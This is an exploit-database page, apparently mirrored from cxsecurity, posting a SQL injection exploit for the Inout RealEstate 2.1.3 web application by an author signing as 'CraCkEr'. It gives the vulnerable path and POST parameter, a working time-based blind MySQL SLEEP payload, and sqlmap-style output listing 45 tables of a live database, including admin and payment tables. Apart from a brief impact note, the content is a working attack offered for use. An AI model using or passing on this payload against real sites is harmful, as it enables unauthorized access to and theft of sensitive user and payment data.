Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023010039

Below is a copy:

Inout RealEstate 2.1.3 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                  [ Vulnerability ]                                   

:  Author   : CraCkEr                                                                    :
  Website  : inoutscripts.com                                                           
  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        
  Software : Inout RealEstate 2.1.3                                                     
  Vuln Type: SQL Injection                                                              
  Impact   : Database Access                                                            
                                                                                        

                                                                                       

:                                                                                        :
 Release Notes:                                                                         
                                                                           
                                                                                        
 SQL injection attacks can allow unauthorized access to sensitive data, modification of 
 data and crash the application or make it unavailable, leading to lost revenue and     
 damage to a company's reputation.                                                      
                                                                                        

                                                                                      


Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
CryptoJob (Twitter) twitter.com/CryptozJob
   

                                     CraCkEr 2023                                    


Path: /index.php

POST parameter 'lidaray' is vulnerable to SQLI

lidaray=[Inject-HERE]

---
Parameter: lidaray (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ
---

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching tables for database: '*****_realestate'
[INFO] fetching number of tables for database ''*****_realestate'
Database: *****_realestate

[45 tables]
+--------------------------------+
| adcode                         |
| admin_account                  |
| admin_payment_details          |
| agent_list_request_to_user     |
| broker_citymap                 |
| broker_rate                    |
| broker_review                  |
| brokerabusereport              |
| category_property              |
| chat_details                   |
| chat_messages                  |
| checkout_ipn                   |
| countries                      |
| custom_field                   |
| detail_statistics_list         |
| email_templates                |
| enquiry_status                 |
| forgetpassword                 |
| inout_ipns                     |
| invoicegen                     |
| languages                      |
| list_brokermap                 |
| list_images                    |
| list_main                      |
| listopenhouse                  |
| normal_statistics_list         |
| paymentdetailstat              |
| popularsearchlist              |
| ppc_currency                   |
| public_side_media_detail       |
| public_slide_images            |
| recentsearchlist               |
| settings                       |
| sold_listing                   |
| soldlistadd                    |
| traveller_bank_deposit_history |
| user_broker_licenses           |
| user_broker_registration       |
| user_email_verification        |
| user_list_agent_request        |
| user_registration              |
| user_wishlist_mapping          |
| userabusereport                |
| userlistactive                 |
| wish_list                      |
+--------------------------------+

[-] Done

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.